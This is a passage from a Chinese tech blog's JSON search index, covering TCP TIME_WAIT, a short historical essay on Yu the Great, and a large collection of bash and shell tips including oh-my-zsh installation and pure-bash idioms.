memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。","title":"TIME_WAIT与持久连接"},{"content":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?\n","permalink":"https://wdd.js.org/posts/2020/01/encss4/","summary":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?","title":"论禹三过家门而不入的真实原因"},{"content":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,想主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味有故障? ","permalink":"https://wdd.js.org/network/yoc1k0/","summary":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,想主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味有故障? ","title":"漫话TCP TIME-WAIT状态【ing】"},{"content":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $? # 上个进程的退出码 echo $* # 类似列表方式,但是参数被当做一个实体, \u0026#34;$1c$2c$3\u0026#34; c是IFS的第一个字符 echo $0 # 脚本名 echo $1 $2 $3 # 第一、第二、第三个参数 for i in $@ do echo $i done for j in $@ do echo $j done 判断git仓库是否clean check_is_repo_clean () { if [ -n \u0026#34;$(git status --porcelain)\u0026#34; ]; then echo \u0026#34;Working directory is not clean\u0026#34; exit 1 fi } 文件批处理 for in循环 for f in *.txt; do mv $f $f.gz; done for d in *.gz; do gunzip $d; done shell 重定向到/dev/null ls \u0026amp;\u0026gt;/dev/null; #标准错误和标准输出都不想看 ls 1\u0026gt;/dev/null; #不想看标准输出 ls 2\u0026gt;/dev/null; 标准错误不想看 sed: -e expression #1, char 21: unknown option to `s' 出现这个问题,一般是要替换的字符串中也有/符号,所以要把分隔符改成 ! 或者 |\nsed -i \u0026#34;s!WJ_CONF_URL!$WJ_CONF_URL!g\u0026#34; file.txt 发送UDP消息 在shell是bash的时候, 可以使用 echo 或者 cat将内容重定向到 /dev/udp/ip/port中,来发送udp消息\necho \u0026#34;hello\u0026#34; \u0026gt; /dev/udp/192.168.1.1/8000 grep排除自身 下面查找名称包括rtpproxy的进程,grep出来找到这个进程外,还找到了grep这条语句的进程,一般来说,这个进程是多余的。\n➜ ~ ps aux | grep rtpproxy root 3353 0.3 0.0 186080 968 ? Sl 2019 250:05 rtpproxy -f -l root 31440 0.0 0.0 112672 980 pts/0 S+ 10:12 0:00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn rtpproxy 但是,如果我们用中括号,将搜索关键词的第一个字符包裹起来,就可以排除grep自身。\n[root@localhost ~]# ps aux | grep \u0026#39;[r]tpproxy\u0026#39; root 3353 0.3 0.0 186080 968 ? Sl 2019 250:06 rtpproxy -f -l ","permalink":"https://wdd.js.org/shell/all-in-one/","summary":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $?","title":"常用shell技巧"},{"content":"参考 https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-pdf/","summary":"参考 https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","title":"opensips 与 webrtc资料整理"},{"content":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","permalink":"https://wdd.js.org/shell/manu-install-ohmyzsh/","summary":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","title":"手工安装oh-my-zsh"},{"content":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","permalink":"https://wdd.js.org/shell/m4-env/","summary":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","title":"m4读取环境变量"},{"content":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.\u0026#34; fi # Inverse (var does not start with sub_string). if [[ $var != sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not start with sub_string.\u0026#34; fi 字符串结尾 if [[ $var == *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var ends with sub_string.\u0026#34; fi # Inverse (var does not end with sub_string). if [[ $var != *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not end with sub_string.\u0026#34; fi 循环 数字范围循环 Alternative to seq.\n# Loop from 0-100 (no variable support). for i in {0..100}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 变量循环 Alternative to seq.\n# Loop from 0-VAR. VAR=50 for ((i=0;i\u0026lt;=VAR;i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 数组遍历 arr=(apples oranges tomatoes) # Just elements. for element in \u0026#34;${arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$element\u0026#34; done 索引遍历 arr=(apples oranges tomatoes) # Elements and index. for i in \u0026#34;${!arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done # Alternative method. for ((i=0;i\u0026lt;${#arr[@]};i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done 文件或者目录遍历 Don’t use ls.\n# Greedy example. for file in *; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # PNG files in dir. for file in ~/Pictures/*.png; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate over directories. for dir in ~/Downloads/*/; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$dir\u0026#34; done # Brace Expansion. for file in /path/to/parentdir/{file1,file2,subdir/file3}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate recursively. shopt -s globstar for file in ~/Pictures/**/*; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done shopt -u globstar 文件处理 CAVEAT: bash does not handle binary data properly in versions \u0026lt; 4.4.\n将文件读取为字符串 Alternative to the cat command.\nfile_data=\u0026#34;$(\u0026lt;\u0026#34;file\u0026#34;)\u0026#34; 将文件按行读取成数组 Alternative to the cat command.\n# Bash \u0026lt;4 (discarding empty lines). IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra file_data \u0026lt; \u0026#34;file\u0026#34; # Bash \u0026lt;4 (preserving empty lines). while read -r line; do file_data+=(\u0026#34;$line\u0026#34;) done \u0026lt; \u0026#34;file\u0026#34; # Bash 4+ mapfile -t file_data \u0026lt; \u0026#34;file\u0026#34; 获取文件头部的 N 行 Alternative to the head command.\nCAVEAT: Requires bash 4+\nExample Function:\nhead() { # Usage: head \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn \u0026#34;$1\u0026#34; line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]}\u0026#34; } Example Usage:\n$ head 2 ~/.bashrc # Prompt PS1=\u0026#39;➜ \u0026#39; $ head 1 ~/.bashrc # Prompt 获取尾部 N 行 Alternative to the tail command.\nCAVEAT: Requires bash 4+\nExample Function:\ntail() { # Usage: tail \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn 0 line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]: -$1}\u0026#34; } Example Usage:\n$ tail 2 ~/.bashrc # Enable tmux. # [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux $ tail 1 ~/.bashrc # [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux 获取文件行数 Alternative to wc -l.\nExample Function (bash 4):\nlines() { # Usage: lines \u0026#34;file\u0026#34; mapfile -tn 0 lines \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${#lines[@]}\u0026#34; } Example Function (bash 3):\nThis method uses less memory than the mapfile method and works in bash 3 but it is slower for bigger files.\nlines_loop() { # Usage: lines_loop \u0026#34;file\u0026#34; count=0 while IFS= read -r _; do ((count++)) done \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$count\u0026#34; } Example Usage:\n$ lines ~/.bashrc 48 $ lines_loop ~/.bashrc 48 计算文件或者文件夹数量 This works by passing the output of the glob to the function and then counting the number of arguments.\nExample Function:\ncount() { # Usage: count /path/to/dir/* # count /path/to/dir/*/ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$#\u0026#34; } Example Usage:\n# Count all files in dir. $ count ~/Downloads/* 232 # Count all dirs in dir. $ count ~/Downloads/*/ 45 # Count all jpg files in dir. $ count ~/Pictures/*.jpg 64 创建临时文件 Alternative to touch.\n# Shortest. \u0026gt;file # Longer alternatives: :\u0026gt;file echo -n \u0026gt;file printf \u0026#39;\u0026#39; \u0026gt;file 在两个标记之间抽取 N 行 Example Function:\nextract() { # Usage: extract file \u0026#34;opening marker\u0026#34; \u0026#34;closing marker\u0026#34; while IFS=$\u0026#39;\\n\u0026#39; read -r line; do [[ $extract \u0026amp;\u0026amp; $line != \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$line\u0026#34; [[ $line == \u0026#34;$2\u0026#34; ]] \u0026amp;\u0026amp; extract=1 [[ $line == \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; extract= done \u0026lt; \u0026#34;$1\u0026#34; } Example Usage:\n# Extract code blocks from MarkDown file. $ extract ~/projects/pure-bash/README.md \u0026#39;```sh\u0026#39; \u0026#39;```\u0026#39; # Output here... 文件路径 获取文件的目录 Alternative to the dirname command.\nExample Function:\ndirname() { # Usage: dirname \u0026#34;path\u0026#34; local tmp=${1:-.} [[ $tmp != *[!/]* ]] \u0026amp;\u0026amp; { printf \u0026#39;/\\n\u0026#39; return } tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} [[ $tmp != */* ]] \u0026amp;\u0026amp; { printf \u0026#39;.\\n\u0026#39; return } tmp=${tmp%/*} tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ dirname ~/Pictures/Wallpapers/1.jpg /home/black/Pictures/Wallpapers $ dirname ~/Pictures/Downloads/ /home/black/Pictures 获取文件路径的 base-name Alternative to the basename command.\nExample Function:\nbasename() { # Usage: basename \u0026#34;path\u0026#34; [\u0026#34;suffix\u0026#34;] local tmp tmp=${1%\u0026#34;${1##*[!/]}\u0026#34;} tmp=${tmp##*/} tmp=${tmp%\u0026#34;${2/\u0026#34;$tmp\u0026#34;}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ basename ~/Pictures/Wallpapers/1.jpg 1.jpg $ basename ~/Pictures/Wallpapers/1.jpg .jpg 1 $ basename ~/Pictures/Downloads/ Downloads 变量 变量声明和使用 $ hello_world=\u0026#34;value\u0026#34; # Create the variable name. $ var=\u0026#34;world\u0026#34; $ ref=\u0026#34;hello_$var\u0026#34; # Print the value of the variable name stored in \u0026#39;hello_$var\u0026#39;. $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${!ref}\u0026#34; value Alternatively, on bash 4.3+:\n$ hello_world=\u0026#34;value\u0026#34; $ var=\u0026#34;world\u0026#34; # Declare a nameref. $ declare -n ref=hello_$var $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$ref\u0026#34; value 基于变量命名变量 $ var=\u0026#34;world\u0026#34; $ declare \u0026#34;hello_$var=value\u0026#34; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$hello_world\u0026#34; value ESCAPE SEQUENCES Contrary to popular belief, there is no issue in utilizing raw escape sequences. Using tput abstracts the same ANSI sequences as if printed manually. Worse still, tput is not actually portable. There are a number of tput variants each with different commands and syntaxes (try tput setaf 3 on a FreeBSD system). Raw sequences are fine.\n文本颜色 NOTE: Sequences requiring RGB values only work in True-Color Terminal Emulators.\nSequence What does it do? Value \\e[38;5;\u0026lt;NUM\u0026gt;m Set text foreground color. 0-255 \\e[48;5;\u0026lt;NUM\u0026gt;m Set text background color. 0-255 \\e[38;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text foreground color to RGB color. R, G, B \\e[48;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text background color to RGB color. R, G, B 文本属性 NOTE: Prepend 2 to any code below to turn it\u0026rsquo;s effect off(examples: 21=bold text off, 22=faint text off, 23=italic text off).\nSequence What does it do? \\e[m Reset text formatting and colors. \\e[1m Bold text. \\e[2m Faint text. \\e[3m Italic text. \\e[4m Underline text. \\e[5m Blinking text. \\e[7m Highlighted text. \\e[8m Hidden text. \\e[9m Strike-through text. 光标移动 Sequence What does it do? Value \\e[\u0026lt;LINE\u0026gt;;\u0026lt;COLUMN\u0026gt;H Move cursor to absolute position. line, column \\e[H Move cursor to home position (0,0). \\e[\u0026lt;NUM\u0026gt;A Move cursor up N lines. num \\e[\u0026lt;NUM\u0026gt;B Move cursor down N lines. num \\e[\u0026lt;NUM\u0026gt;C Move cursor right N columns. num \\e[\u0026lt;NUM\u0026gt;D Move cursor left N columns. num \\e[s Save cursor position. \\e[u Restore cursor position. 文本擦除 Sequence What does it do? \\e[K Erase from cursor position to end of line. \\e[1K Erase from cursor position to start of line. \\e[2K Erase the entire current line. \\e[J Erase from the current line to the bottom of the screen. \\e[1J Erase from the current line to the top of the screen. \\e[2J Clear the screen. \\e[2J\\e[H Clear the screen and move cursor to 0,0. 参数展开 指令 Parameter What does it do? ${!VAR} Access a variable based on the value of VAR. ${!VAR*} Expand to IFS separated list of variable names starting with VAR. ${!VAR@} Expand to IFS separated list of variable names starting with VAR. If double-quoted, each variable name expands to a separate word. 替换 Parameter What does it do? ${VAR#PATTERN} Remove shortest match of pattern from start of string. ${VAR##PATTERN} Remove longest match of pattern from start of string. ${VAR%PATTERN} Remove shortest match of pattern from end of string. ${VAR%%PATTERN} Remove longest match of pattern from end of string. ${VAR/PATTERN/REPLACE} Replace first match with string. ${VAR//PATTERN/REPLACE} Replace all matches with string. ${VAR/PATTERN} Remove first match. ${VAR//PATTERN} Remove all matches. 长度 Parameter What does it do? ${#VAR} Length of var in characters. ${#ARR[@]} Length of array in elements. 展开 Parameter What does it do? ${VAR:OFFSET} Remove first N chars from variable. ${VAR:OFFSET:LENGTH} Get substring from N character to N character. (${VAR:10:10}: Get sub-string from char 10 to char 20) ${VAR:: OFFSET} Get first N chars from variable. ${VAR:: -OFFSET} Remove last N chars from variable. ${VAR: -OFFSET} Get last N chars from variable. ${VAR:OFFSET:-OFFSET} Cut first N chars and last N chars. 大小写修改 Parameter What does it do? CAVEAT ${VAR^} Uppercase first character. bash 4+ ${VAR^^} Uppercase all characters. bash 4+ ${VAR,} Lowercase first character. bash 4+ ${VAR,,} Lowercase all characters. bash 4+ ${VAR~} Reverse case of first character. bash 4+ ${VAR~~} Reverse case of all characters. bash 4+ 默认值 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 大括号展开 范围 # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;} # Print numbers 1-100. echo {1..100} # Print range of floats. echo 1.{1..9} # Print chars a-z. echo {a..z} echo {A..Z} # Nesting. echo {A..Z}{0..9} # Print zero-padded numbers. # CAVEAT: bash 4+ echo {01..100} # Change increment amount. # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;..\u0026lt;INCREMENT\u0026gt;} # CAVEAT: bash 4+ echo {1..10..2} # Increment by 2. 字符串列表 echo {apples,oranges,pears,grapes} # Example Usage: # Remove dirs Movies, Music and ISOS from ~/Downloads/. rm -rf ~/Downloads/{Movies,Music,ISOS} 条件表达式 文件条件判断 Expression Value What does it do? -a file If file exists. -b file If file exists and is a block special file. -c file If file exists and is a character special file. -d file If file exists and is a directory. -e file If file exists. -f file If file exists and is a regular file. -g file If file exists and its set-group-id bit is set. -h file If file exists and is a symbolic link. -k file If file exists and its sticky-bit is set -p file If file exists and is a named pipe (FIFO). -r file If file exists and is readable. -s file If file exists and its size is greater than zero. -t fd If file descriptor is open and refers to a terminal. -u file If file exists and its set-user-id bit is set. -w file If file exists and is writable. -x file If file exists and is executable. -G file If file exists and is owned by the effective group ID. -L file If file exists and is a symbolic link. -N file If file exists and has been modified since last read. -O file If file exists and is owned by the effective user ID. -S file If file exists and is a socket. 文件比较 Expression What does it do? file -ef file2 If both files refer to the same inode and device numbers. file -nt file2 If file is newer than file2 (uses modification time) or file exists and file2 does not. file -ot file2 If file is older than file2 (uses modification time) or file2 exists and file does not. 变量测试 Expression Value What does it do? -o opt If shell option is enabled. -v var If variable has a value assigned. -R var If variable is a name reference. -z var If the length of string is zero. -n var If the length of string is non-zero. 变量比较 Expression What does it do? var = var2 Equal to. var == var2 Equal to (synonym for =). var != var2 Not equal to. var \u0026lt; var2 Less than (in ASCII alphabetical order.) var \u0026gt; var2 Greater than (in ASCII alphabetical order.) 算数操作 赋值 Operators What does it do? = Initialize or change the value of a variable. 算数 Operators What does it do? + Addition - Subtraction * Multiplication / Division ** Exponentiation % Modulo += Plus-Equal (Increment a variable.) -= Minus-Equal (Decrement a variable.) *= Times-Equal (Multiply a variable.) /= Slash-Equal (Divide a variable.) %= Mod-Equal (Remainder of dividing a variable.) 位操作 Operators What does it do? \u0026lt;\u0026lt; Bitwise Left Shift \u0026lt;\u0026lt;= Left-Shift-Equal \u0026gt;\u0026gt; Bitwise Right Shift \u0026gt;\u0026gt;= Right-Shift-Equal \u0026amp; Bitwise AND \u0026amp;= Bitwise AND-Equal | Bitwise OR |= Bitwise OR-Equal ~ Bitwise NOT ^ Bitwise XOR ^= Bitwise XOR-Equal 逻辑 Operators What does it do? ! NOT \u0026amp;\u0026amp; AND || OR Miscellaneous Operators What does it do? Example , Comma Separator ((a=1,b=2,c=3)) ARITHMETIC Simpler syntax to set variables # Simple math ((var=1+2)) # Decrement/Increment variable ((var++)) ((var--)) ((var+=1)) ((var-=1)) # Using variables ((var=var2*arr[2])) Ternary Tests # Set the value of var to var2 if var2 is greater than var. # var: variable to set. # var2\u0026gt;var: Condition to test. # ?var2: If the test succeeds. # :var: If the test fails. ((var=var2\u0026gt;var?var2:var)) TRAPS Traps allow a script to execute code on various signals. In pxltrm (a pixel art editor written in bash) traps are used to redraw the user interface on window resize. Another use case is cleaning up temporary files on script exit.\nTraps should be added near the start of scripts so any early errors are also caught.\nNOTE: For a full list of signals, see trap -l.\nDo something on script exit # Clear screen on script exit. trap \u0026#39;printf \\\\e[2J\\\\e[H\\\\e[m\u0026#39; EXIT Ignore terminal interrupt (CTRL+C, SIGINT) trap \u0026#39;\u0026#39; INT React to window resize # Call a function on window resize. trap \u0026#39;code_here\u0026#39; SIGWINCH Do something before every command trap \u0026#39;code_here\u0026#39; DEBUG Do something when a shell function or a sourced file finishes executing trap \u0026#39;code_here\u0026#39; RETURN PERFORMANCE Disable Unicode If unicode is not required, it can be disabled for a performance increase. Results may vary however there have been noticeable improvements in neofetch and other programs.\n# Disable unicode. LC_ALL=C LANG=C OBSOLETE SYNTAX Shebang Use #!/usr/bin/env bash instead of #!/bin/bash.\nThe former searches the user\u0026rsquo;s PATH to find the bash binary. The latter assumes it is always installed to /bin/ which can cause issues. NOTE: There are times when one may have a good reason for using #!/bin/bash or another direct path to the binary.\n# Right: #!/usr/bin/env bash # Less right: #!/bin/bash Command Substitution Use $() instead of .\n# Right. var=\u0026#34;$(command)\u0026#34; # Wrong. var=`command` # $() can easily be nested whereas `` cannot. var=\u0026#34;$(command \u0026#34;$(command)\u0026#34;)\u0026#34; Function Declaration Do not use the function keyword, it reduces compatibility with older versions of bash.\n# Right. do_something() { # ... } # Wrong. function do_something() { # ... } INTERNAL VARIABLES Get the location to the bash binary \u0026#34;$BASH\u0026#34; Get the version of the current running bash process # As a string. \u0026#34;$BASH_VERSION\u0026#34; # As an array. \u0026#34;${BASH_VERSINFO[@]}\u0026#34; Open the user\u0026rsquo;s preferred text editor \u0026#34;$EDITOR\u0026#34; \u0026#34;$file\u0026#34; # NOTE: This variable may be empty, set a fallback value. \u0026#34;${EDITOR:-vi}\u0026#34; \u0026#34;$file\u0026#34; Get the name of the current function # Current function. \u0026#34;${FUNCNAME[0]}\u0026#34; # Parent function. \u0026#34;${FUNCNAME[1]}\u0026#34; # So on and so forth. \u0026#34;${FUNCNAME[2]}\u0026#34; \u0026#34;${FUNCNAME[3]}\u0026#34; # All functions including parents. \u0026#34;${FUNCNAME[@]}\u0026#34; Get the host-name of the system \u0026#34;$HOSTNAME\u0026#34; # NOTE: This variable may be empty. # Optionally set a fallback to the hostname command. \u0026#34;${HOSTNAME:-$(hostname)}\u0026#34; Get the architecture of the Operating System \u0026#34;$HOSTTYPE\u0026#34; Get the name of the Operating System / Kernel This can be used to add conditional support for different OperatingSystems without needing to call uname.\n\u0026#34;$OSTYPE\u0026#34; Get the current working directory This is an alternative to the pwd built-in.\n\u0026#34;$PWD\u0026#34; Get the number of seconds the script has been running \u0026#34;$SECONDS\u0026#34; Get a pseudorandom integer Each time $RANDOM is used, a different integer between 0 and 32767 is returned. This variable should not be used for anything related to security (this includes encryption keys etc).\n\u0026#34;$RANDOM\u0026#34; INFORMATION ABOUT THE TERMINAL Get the terminal size in lines and columns (from a script) This is handy when writing scripts in pure bash and stty/tput can’t becalled.\nExample Function:\nget_term_size() { # Usage: get_term_size # (:;:) is a micro sleep to ensure the variables are # exported immediately. shopt -s checkwinsize; (:;:) printf \u0026#39;%s\\n\u0026#39; \u0026#34;$LINES $COLUMNS\u0026#34; } Example Usage:\n# Output: LINES COLUMNS $ get_term_size 15 55 Get the terminal size in pixels CAVEAT: This does not work in some terminal emulators.\nExample Function:\nget_window_size() { # Usage: get_window_size printf \u0026#39;%b\u0026#39; 